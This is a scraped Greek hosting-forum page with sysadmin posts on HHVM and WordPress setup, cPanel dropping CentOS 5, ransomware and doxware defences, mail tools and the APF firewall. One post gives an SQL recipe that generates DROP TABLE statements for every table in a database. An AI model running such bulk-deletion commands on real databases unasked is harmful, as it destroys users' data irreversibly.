PRIVILEGES; mysql> EXIT; Install HHVM HHVM is not available in the Ubuntu repository, so, first, it’s necessary to add an external one. This requires editing /etc/apt/sources.list and updating repos. Just execute the following commands: $ wget -O - http://dl.hhvm.com/conf/hhvm.gpg.key | sudo apt-key add - $ echo deb http://dl.hhvm.com/ubuntu xenial main | sudo tee /etc/apt/sources.list.d/hhvm.list # apt update Now, install HHVM with apt: # apt install -y hhvm Configure and test HHVM After installation, in /usr/share/hhvm there is a script for configuring the Nginx web server to use HHVM. Just execute the following: # /usr/share/hhvm/install_fastcgi.sh This is a quick process, at the end of which you can start HHVM: # systemctl start hhvm.service If you need to run web scripts, and you want it to start at boot, execute the command: # update-rc.d hhvm defaults You can decide to use HHVM for /usr/bin/php even if you have a php-cli already installed: # /usr/bin/update-alternatives --install /usr/bin/php php /usr/bin/hhvm 60 Next, you can test HHVM in different ways (for example, you can call it on existing PHP scripts present in your filesystem, just like php-cli). In this case, we use it on the web server. So, create a file called info.php in /var/www/html and enter the following lines: <?php phpinfo(); ?> Edit Nginx Virtual Host file, adding in it index.php: # $EDITOR /etc/nginx/sites-available/default Here: index index.php index.html index.htm index.nginx-debian.html; After saving, exit, and test. With your browser, go to http://localhost/info.php Here, you should see HHVM on top of the page: this means that it is working as expected. Install WordPress Now, you must install WordPress. This is quite easy, just execute the commands: # cd /var/www/html # wget wordpress.org/latest.zip # unzip latest.zip The unzip command will create a new folder, wordpress. Move all of its content into /var/www/html # mv wordpress/* . # rm -rf wordpress/ Change the owner for the WordPress files: # find . -type d -exec chown www-data:www-data {} \; # find . -type f -exec chown www-data:www-data {} \; Rename wp-config-sample.php to wp-config.php, then edit it: # mv wp-config-sample.php wp-config.php # $EDITOR wp-config.php Here, change database informations using the one you specified in the MariaDB configuration process: DB_NAME = mywordpressdb DB_USER = wordpressuser DB_PASSWORD = my_strong_password Restart the server: # systemctl restart nginx After that, go to your server IP, and you will be redirected to the WordPress installation, which is totally created in your web browser. After filling out all of the required forms, WordPress will be ready for you! And that’s all you need for creating you website with WP on an Ubuntu 16.04 running Nginx, with HHVM. https://www.unixmen.com/install-wordpress-nginx-hhvm-mariadb-ubuntu-16-04/
-
Γιάννη δεν έχω ιδέα, έχεις κάποια συγκεκριμένη προσφορά να δούμε ?
-
Καλημέρα !!! πως σου φαίνεται η όλη προσπάθεια ?
-
Καλώς ήρθατε στο designhost.gr.
Νιώστε ελεύθερα και πλοηγηθείτε στην κοινότητα μας όπου μπορείτε να βρείτε διάφορες πληροφορίες και να γνωριστείτε με τα υπόλοιπα μέλη.
Μην διστάσετε να μας ρωτήσετε για οποιαδήποτε απορία σας ή διευκρίνηση.
-
This video walks you through the SSL TLS Wizard to obtain a certificate for an arrangement of addon, subdomains, and parked/aliased domains. Music by bensound.com We filmed this tutorial with cPanel & WHM version 60 and the Paper Lantern theme, so the interface and features may differ from the current version. We'll produce newer tutorials as the feature evolves and improves. You can find documentation about the main cPanel interface at https://documentation.cpanel.net/disp... Please let us know if there are additional features or procedures that you would like for us to demonstrate with a walkthrough in video format.
-
benny Vasquez / Apr 21st, 2016 / Products March 31st, 2017: The Day the Sun Sets on CentOS 5 CentOS 5 will reach end of life officially on March 31st of 2017, but as an industry we are already feeling the pain of people still using the out of date OS. Trying to support a system on an aging Operating System is not that far from trying to live in an aging apartment building. Ill-fitting fixtures, flickering electricity, and malfunctioning plumbing are just some of the daily struggles in those old buildings. Similarly, when the basic requirements of modern hosting are a struggle to maintain it has a severe and direct impact on every webhost’s quality of life. cPanel & WHM version 56 (in the CURRENT tier as of April 11th, 2016, with an expected End of Life of May of 2017) will be the last version of cPanel to support CentOS 5, and 32bit Architecture. We have considered this heavily, and have decided to drop support for those things for two primary reasons: As a software provider, the opportunity cost of continuing to support the oldest infrastructure is too high, and it severely limits the amount of new things we can deliver to our users. As an industry, cPanel believes making it easier for people to continue to host on old, insecure, out of date software ultimately hurts us all. Deprecating support for older systems and older software is necessary for the over-all health of the hosting industry. cPanel is keeping its eye on the future, and letting the old software go. But we know how hard it traditionally is to migrate from an old server to a new one. To help with that we developed the Server Configuration addition to the transfer tool. The Server Configuration Additions to the Transfer Tool In version 11.44 we introduced the Transfer Tool, and it has proved a reliable tool to migrate accounts and packages between servers. As of v56 you can use it to transfer server configurations between servers as well. Note: This is intended to be used to transfer configurations from an existing v56 server to a new server. No attempt is made to back up configurations on the destination server. Additionally, this tool is not intended to be used to migrate configurations from compromised servers. If you’re familiar with the transfer tool, you will find that the additions we’ve made are incredibly simple to use. Once you authenticate to the origin server, you’ll see an expandable section called “Service Configurations”. Click the ‘Show’ button: Choose the configurations you want to transfer, and go through the Transfer Tool like you normally would: The configurations are moved to the new server, any relevant services are restarted, and you’re all set! The same team that built this interface also expanded the functionality of the cpconftool, to help you complete a similar migration on the command line. The cpconftool a command line utility that operates in a very similar way to pkgacct. You can read more about it on our documentation site. You can find the full documentation about the additions to the Transfer Tool in the Transfer Tool Documentation for v56. Note: Due to the potential complications involved, currently MySQL is not included in the WHM Transfer Tool interface. You can still copy your MySQL configuration using the command line tool cpconftool, you can still back up and manually copy your MySQL configuration v56 will be the last version of cPanel to support CentOS 5, the last version to support 32bit architecture. Just in case it wasn’t obvious yet, we want you to upgrade, to migrate, and to keep using and providing new and better software. If you still have any hesitation about the Transfer Tool’s additions, I’d love to hear about it! Email me or tweet me, and let me know! https://blog.cpanel.com/end-of-life-for-centos5/
-
The evolution of extortionware https://techtalk.gfi.com/the-evolution-of-extortionware/ Debra Littlejohn Shinder on February 7, 2017 We’ve all heard a lot about ransomware that makes data inaccessible and/or locks up the computer or device until you pay for the encryption key. Now we’re seeing a variant on that theme that some call doxware, or extortionware, that goes further and threatens to release copies of the private documents, photos, and email messages on your computer to the public if you don’t pay up. It’s just one example of how malware has evolved over the past few years and is becoming more and more aggressive. Ransomware gets its name from the fact that it holds some or all of your files hostage and demands payment to release them. This particularly heinous type of malware has been around at least since the 1980s, when the incarnation known as AIDS appeared. Various ransomware Trojans have cropped up over the years, but really ramped up a few years ago as Bitcoin offered the opportunity for attackers to easily collect the money without going through traditional channels. CryptoLocker is one of the best-known examples of ransomware. The original version sprang to life in 2013, distributed via a botnet and malicious email attachments. The next year, the botnet was taken down by a consortium of law enforcement agencies, software vendors, commercial security research companies and academic security research departments at several prominent universities, in Operation Tovar. Not only was the botnet dismantled, but the private keys used to encrypt victims’ files were seized and made available, so that particular story had a happy ending. Unfortunately, it was far from the end of ransomware, and new extortionist malware programs have “borrowed” the CryptoLocker name even though they aren’t technically variants of it. Other well-known ransomware attacks include Cryptowall and Reveton for Windows, and KeeRanger on Mac OS X. Then there’s a whole other category of ransomware that targets smartphone and tablet operating systems. Extortionware goes mobile Many people today, especially young people, rarely use desktop or even laptop computers. That doesn’t mean they’ve sworn off the Internet; to the contrary, they’re online all the time, but they do it using mobile devices. So it’s no wonder the ransomware authors have turned their attention to creating malicious code that targets those devices. As mentioned in the introduction, there are basically two types of ransomware: Those that encrypt your data so you can’t view or use it, called (appropriately enough)encrypting ransomware Those that prevent you from logging onto the computer or device or from using one or more applications (such as your web browser), called blocking ransomware or just blockers. Note: There is also a variety of scamware called “scareware” that doesn’t really do anything but only threatens to; this includes those email messages that tell you the FBI has found something illegal on your computer and will arrest you if you don’t send money for the “fine.” Encrypting ransomware is the most popular on desktop operating systems, but they don’t work as well with mobile devices because the data is usually stored in the cloud instead of (or in addition to) on the device where the malware can hijack it. Thus a majority of mobile ransomware programs are blockers. Popular mobile ransomware blockers include Small, Fusob, Pletor and Svpeng. Small and Fusob combine the “threatware” idea with screen overlays that prevent you from using the apps on your device. Mobile ransomware is often disguised as a legitimate third party app or game, installed as a “drive-by download” from questionable websites, or through links in text messages. Doxware takes electronic extortion to a new level Doxing is a relatively new term that refers to the public release of private information about an individual or organization. Doxware does (or threatens to do) exactly the opposite of what traditional ransomware does; instead of locking up your sensitive “docs” and making them inaccessible to you, it makes them accessible to everybody – unless you pay up. If encrypting and blocking extortionware is analogous to hostage-taking for ransom, doxware is comparable to the blackmailer who demands money to keep your secrets quiet. For this reason, doxware is sometimes also called leakware. Doxware often targets email and word processing files. Mobile variants could release private messages, pictures or contact lists from users’ phones. Doxware can be more effective than ransomware at invoking a positive (from the attacker’s point of view) response because victims can circumvent regular ransomware encryption by maintaining separate backups of data, or get past blockers by formatting the hard drive and doing a clean restore. However, once an attacker has information that you don’t want made public, there is little you can do to prevent that other than pay up. The scope of the problem Even though it’s been with us for a long time, the proliferation of extortionware has exploded over the last few years, and some have dubbed 2016 “the year of ransomware” as both the distribution and the code itself became more sophisticated and touched more and more computer and device users. I’ve never had to deal with extortionware on my own systems (thanks in part to careful security practices and in part to good luck) but I have a number of friends and relatives from all walks of life, including a few in the IT industry, who have fallen victim to it. Both individual users and businesses are vulnerable. An Osterman Research survey in 2016 showed that nearly half of respondents said their organizations that been the victim of a ransomware attack during the previous 12 months. CNN statistics showed $209 million paid to ransomware attackers in the first quarter of 2016, and FBI estimates indicated a likely ransomware loss of $1 billion or more for the year. In addition, the average ransomware demand increased from $294 in 2015 to $679 in 2016. While that $679 average might not seem like much, smaller amounts extorted from individuals are balanced by much larger ransoms targeting organizations, such as the $3.4 million that cybercriminals demanded from Hollywood Presbyterian hospital in early 2016. Protecting against extortionware Obviously extortionware is a big threat and should be on your security radar. So how do you protect your organization from it? As you might guess, many of the recommended measures are the same used to protect against other types of malware: Keep your OS and applications updated and install all security patches Back up important files regularly to a site that is disconnected when not backing up (to prevent ransomware from also encrypting your backup files) Authenticate inbound email Implement ad blocking on web browsers since malware is often delivered through “malvertisements,” even on legitimate sites Disable unneeded services (CryptoLocker, for example, often targeted machines using Remote Desktop Protocol, so disabling RDP if you don’t use it helps protect against it) Educate users in safe computing practices and reinforce the importance on a regular basis: Don’t click on links in email, texts, and on web sites you don’t trust Show hidden file extensions so executables can’t be disguised as PDFs or JPGs or other more innocuous file types Don’t visit questionable web sites (porn, warez, music piracy sites, hacker forums, etc.) Don’t download mobile apps from untrusted sources Several of the popular security vendors offer security suites to protect against malware, including extortionware. They also offer mobile security solutions that are designed to scan your phone or tablet and check apps against their databases of known threats, and can also warn you of websites that are infected with ransomware (or other malware). Most experts recommend that you not pay the ransom as this encourages the criminals – and in many cases victims have paid and never received the keys, or received keys that didn’t work. Remember that criminals, by definition, are not trustworthy and are prone to not keeping their promises. Summary Extortionware is big business and becoming more so. Companies and other large organizations are prime targets because they’re seen as having deep pockets.
-
- ransomware
- extortionware
-
(and 1 more)
Tagged with:
-
πολλοί γνωρίζουν το MX toolbox ( http://mxtoolbox.com/ ) αλλά πολύ λιγότεροι έχουν δεί πως διαθέτει δικό του deliverability tool https://mxtoolbox.com/deliverability How it works: Step 1: Send an email to ping@tools.mxtoolbox.com Step 2: Once you have sent that message it will reply. Click the link: "View your full Deliverability Report" ABOUT EMAIL DELIVERABILITY This tool requires you to send a test message to MxToolbox. Our systems analyze the headers, the blacklist reputation of your outbound IP address, and your SPF records to generate a comprehensive deliverability report.
-
έχει τύχει να αλλάζει κωδικός σε Active Directory ( συνεπώς και MS Exchange password ) και το ActiveSync handheld να συνεχίζει να συγχρονίζει το mailbox ώρες μετά με τον παλιό .... πρακτικά τα δύο παρακάτω άρθρα το επεξηγούν, ειδικά το 1ο να πως υποτίθεται πως λειτουργεί και να πως ειναι http://www.techrepublic.com/article/why-does-my-old-password-work-via-activesync/ https://social.technet.microsoft.com/Forums/office/en-US/e792fd57-84b2-4e48-8281-99b062b8a014/activesync-can-sync-6-hours-after-changing-password-in-ad-before-client-asks-for-new-credentials?forum=exchangesvrclientslegacy
-
Κάποιες φορές τυχαίνει να πρέπει να ξανακάνω import σε βάση από SQL data που δεν περιέχουν DROP statements Εκει η διαδικασία λογικά σταματά νωρίς με κάτι τέτοιο: "ERROR 1050 (42S01) at line χχ: Table 'db_table' already exists" αντί να κάνουμε DROP την βάση / recreate και ξανά recreate user connections υπάρχει και το ακόλουθο που παράγει όλα τα DROP statements για κάθε πίνακα της βασης: SELECT CONCAT('DROP TABLE ', TABLE_NAME, ';') FROM INFORMATION_SCHEMA.tables WHERE TABLE_SCHEMA = '{database name}'; θα δείτε κάτι τέτοιο ( παράδειγμα από WP ) +----------------------------------------+ | CONCAT('DROP TABLE ', TABLE_NAME, ';') | +----------------------------------------+ | DROP TABLE wpdbase_commentmeta; | | DROP TABLE wpdbase_comments; | | DROP TABLE wpdbase_links; | | DROP TABLE wpdbase_options; | | DROP TABLE wpdbase_pmxi_history; | | DROP TABLE wpdbase_postmeta; | | DROP TABLE wpdbase_posts; | | DROP TABLE wpdbase_term_relationships; | | DROP TABLE wpdbase_term_taxonomy; | | DROP TABLE wpdbase_termmeta; | | DROP TABLE wpdbase_terms; | | DROP TABLE wpdbase_usermeta; | | DROP TABLE wpdbase_users; | | DROP TABLE wpdbase_wysija_campaign; | | DROP TABLE wpdbase_wysija_campaign_list; | | DROP TABLE wpdbase_wysija_custom_field; | | DROP TABLE wpdbase_wysija_email; | | DROP TABLE wpdbase_wysija_email_user_stat; | | DROP TABLE wpdbase_wysija_email_user_url; | | DROP TABLE wpdbase_wysija_form; | | DROP TABLE wpdbase_wysija_list; | | DROP TABLE wpdbase_wysija_queue; | | DROP TABLE wpdbase_wysija_url; | | DROP TABLE wpdbase_wysija_url_mail; | | DROP TABLE wpdbase_wysija_user; | | DROP TABLE wpdbase_wysija_user_field; | | DROP TABLE wpdbase_wysija_user_history; | | DROP TABLE wpdbase_wysija_user_list; | +----------------------------------------+ 28 rows in set (0.00 sec) και εύκολα μετα προχωράτε σε διαγραφή τους με ένα απλό copy paste εχω βρει και άλλες λύσεις και σίγουρα θα υπάρχει και καλύτερη http://stackoverflow.com/questions/27606518/how-to-drop-all-tables-from-a-database-with-one-sql-query http://stackoverflow.com/questions/536350/drop-all-the-tables-stored-procedures-triggers-constraints-and-all-the-depend http://stackoverflow.com/questions/11053116/mysql-bulk-drop-table-where-table-like
-
Current Release: http://www.rfxn.com/downloads/apf-current.tar.gz http://www.rfxn.com/appdocs/README.apf http://www.rfxn.com/appdocs/CHANGELOG.apf Description: Advanced Policy Firewall (APF) is an iptables(netfilter) based firewall system designed around the essential needs of today’s Internet deployed servers and the unique needs of custom deployed Linux installations. The configuration of APF is designed to be very informative and present the user with an easy to follow process, from top to bottom of the configuration file. The technical side of APF is such that it utilizes the latest stable features from the iptables (netfilter) project to provide a very robust and powerful firewall. The filtering performed by APF is three fold: 1) Static rule based policies (not to be confused with a “static firewall”) 2) Connection based stateful policies 3) Sanity based policies The first, static rule based policies, is the most traditional method of firewalling. This is when the firewall has an unchanging set of instructions (rules) on how traffic should be handled in certain conditions. An example of a static rule based policy would be when you allow/deny an address access to the server with the trust system or open a new port with conf.apf. So the short of it is rules that infrequently or never change while the firewall is running. The second, connection based stateful policies, is a means to distinguish legitimate packets for different types of connections. Only packets matching a known connection will be allowed by the firewall; others will be rejected. An example of this would be FTP data transfers, in an older era of firewalling you would have to define a complex set of static policies to allow FTA data transfers to flow without a problem. That is not so with stateful policies, the firewall can see that an address has established a connection to port 21 then “relate” that address to the data transfer portion of the connection and dynamically alter the firewall to allow the traffic. The third, sanity based policies, is the ability of the firewall to match various traffic patterns to known attack methods or scrutinize traffic to conform to Internet standards. An example of this would be when a would-be attacker attempts to forge the source IP address of data they are sending to you, APF can simply discard this traffic or optionally log it then discard it. To the same extent another example would be when a broken router on the Internet begins to relay malformed packets to you, APF can simply discard them or in other situations reply to the router and have it stop sending you new packets (TCP Reset). Features: – detailed and well commented configuration file – granular inbound and outbound network filtering – user id based outbound network filtering – application based network filtering – trust based rule files with an optional advanced syntax – global trust system where rules can be downloaded from a central management server – reactive address blocking (RAB), next generation in-line intrusion prevention – debug mode provided for testing new features and configuration setups – fast load feature that allows for 1000+ rules to load in under 1 second – inbound and outbound network interfaces can be independently configured – global tcp/udp port & icmp filtering with multiple filters (drop, reject, prohibit) – configurable policies for each ip on the system with convenience variables to import settings – packet flow rate limiting that prevents abuse on the most widely abused protocol, icmp – prerouting and postrouting rules for optimal network performance – dshield.org block list support to ban networks exhibiting suspicious activity – spamhaus Don’t Route Or Peer List support to ban known “hijacked zombie” IP blocks – any number of additional interfaces may be configured as trusted or untrusted – additional firewalled interfaces can have there own unique firewall policies applied – intelligent route verification to prevent embarrassing configuration errors – advanced packet sanity checks to make sure traffic coming and going meets the strictest of standards – filter attacks such as fragmented UDP, port zero floods, stuffed routing, arp poisoning and more – configurable type of service options to dictate the priority of different types of network traffic – intelligent default settings to meet every day server setups – dynamic configuration of your servers local DNS revolvers into the firewall – optional filtering of common p2p applications – optional filtering of private & reserved IP address space – optional implicit blocks of the ident service – configurable connection tracking settings to scale the firewall to the size of your network – configurable kernel hooks (ties) to harden the system further to syn-flood attacks & routing abuses – advanced network control such as explicit congestion notification and overflow control – helper chains for FTP DATA and SSH connections to prevent client side issues – optional rate limited event logging – logging subsystem that allows for logging data to user space programs or standard syslog files – comprehensive logging of every rule added – detailed startup error checking – if you are familiar with netfilter you can create your own rules in any of the policy files – pluggable and ready advanced use of QoS algorithms provided by the Linux – 3rd party add-on projects that compliment APF features Funding: Funding for the continued development and research into this and other projects is solely dependent on public contributions and donations. If this is your first time using this software we ask that you evaluate it and consider a small donation; for those who frequent and are continued users of this and other projects we also ask that you make an occasional donation to help ensure the future of our public projects. https://www.rfxn.com/projects/advanced-policy-firewall/
-
μπορεί να με βρίσουν κάποια μέλη αλλά θα το ρισκάρω !
-
Hello akimo,
Welcome to designhost.gr.
Feel free to browse our community accessing all sorts of information and getting to know our members.
Do not hesitate to ask anything in our forums.
designhost.gr